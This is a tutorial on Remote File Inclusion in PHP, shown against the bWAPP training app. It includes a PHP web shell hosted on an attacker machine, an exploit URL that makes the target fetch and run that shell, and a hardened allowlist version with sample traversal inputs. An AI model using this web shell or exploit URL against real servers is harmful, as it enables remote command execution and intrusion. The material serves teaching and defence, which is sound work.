Introduction
Remote File Inclusion (RFI) is the inclusion of remote files by exploiting vulnerable inclusion procedures implemented in an application, so that the web application downloads and executes a remote file. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing an external URL to be injected. Although most examples point to vulnerable PHP scripts, keep in mind that it is also common in other technologies such as JSP, ASP and others.
Example Remote File Inclusion in PHP
For remote file inclusion to work, two settings in PHP’s configuration file, “php.ini”, need to be set: “allow_url_fopen=On” and “allow_url_include=On”.
- allow_url_fopen: This option enables the URL-aware fopen wrappers, which allow URL objects to be accessed like files. Default wrappers are provided for access to remote files using the ftp or http protocol; some extensions like zlib may register additional wrappers.
- allow_url_include: This option allows the use of URL-aware fopen wrappers with the following functions: include, include_once, require, require_once.
Consider the following URL:
http://192.168.28.129/bWAPP/rlfi.php?language=lang_en.php&action=go
The value of the “language” parameter is passed to the following PHP code, and the file is included:
<?php $language = $_GET["language"]; include($language); ?>
- Now you can set the value of the language parameter to a website on the internet.
Example: http://192.168.28.129/bWAPP/rlfi.php?language=http://hydrasky.com&action=go
The web application downloads the page http://hydrasky.com and passes it to the include() function. This means the RFI vulnerability is present!
- Let's create a remote web shell to get a system shell, read files, write files … The file must not be executable on the remote server, because if the malicious file is executed on the remote server, the victim server will receive HTML content instead of PHP code.
Example: http://192.168.28.1:8888/remote_shell.txt
<?php $output = shell_exec($_GET["cmd"]); echo "<pre> $output </pre>"; ?>
http://192.168.28.129/bWAPP/rlfi.php?language=http://192.168.28.1:8888/remote_shell.txt&action=go&cmd=ls -l
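A hardened form of the include shown above, as an added example that is not part of the original page or of bWAPP: the language value is only looked up in a fixed allowlist and never reaches include(). The file names other than lang_en.php and the lang/ directory are assumptions.

```php
<?php
// Added example (not bWAPP code): allowlist-based replacement for
// include($_GET["language"]). Entries marked "assumed" and the lang/
// directory are illustrative, not taken from the page.

const LANGUAGE_FILES = [
    'lang_en.php' => 'lang_en.php',
    'lang_fr.php' => 'lang_fr.php',   // assumed
    'lang_nl.php' => 'lang_nl.php',   // assumed
];

/**
 * Map the user-supplied value to a fixed local path, or return null.
 * The request value is used only as an array key; the path handed to
 * include() is built entirely from server-side constants.
 */
function resolve_language_file($requested, string $baseDir): ?string
{
    // Arrays (language[]=x) and other non-strings are rejected outright.
    if (!is_string($requested) || !array_key_exists($requested, LANGUAGE_FILES)) {
        return null;
    }
    return rtrim($baseDir, '/') . '/' . LANGUAGE_FILES[$requested];
}

// Constructed inputs: the benign value, the two remote URLs used on this
// page, and a local traversal string for comparison.
$samples = [
    'lang_en.php',
    'http://hydrasky.com',
    'http://192.168.28.1:8888/remote_shell.txt',
    '../../etc/passwd',
];

foreach ($samples as $value) {
    $path = resolve_language_file($value, __DIR__ . '/lang');
    printf("%-45s => %s\n", $value, $path ?? 'rejected');
}

// In the page handler the call would be:
//   $path = resolve_language_file($_GET['language'] ?? null, __DIR__ . '/lang');
//   if ($path === null) { http_response_code(400); exit; }
//   include $path;
// Defence in depth in php.ini: allow_url_include=Off (the PHP default).
```

Run from the command line, only lang_en.php resolves to a path; both remote URLs and the traversal string are rejected before any include takes place.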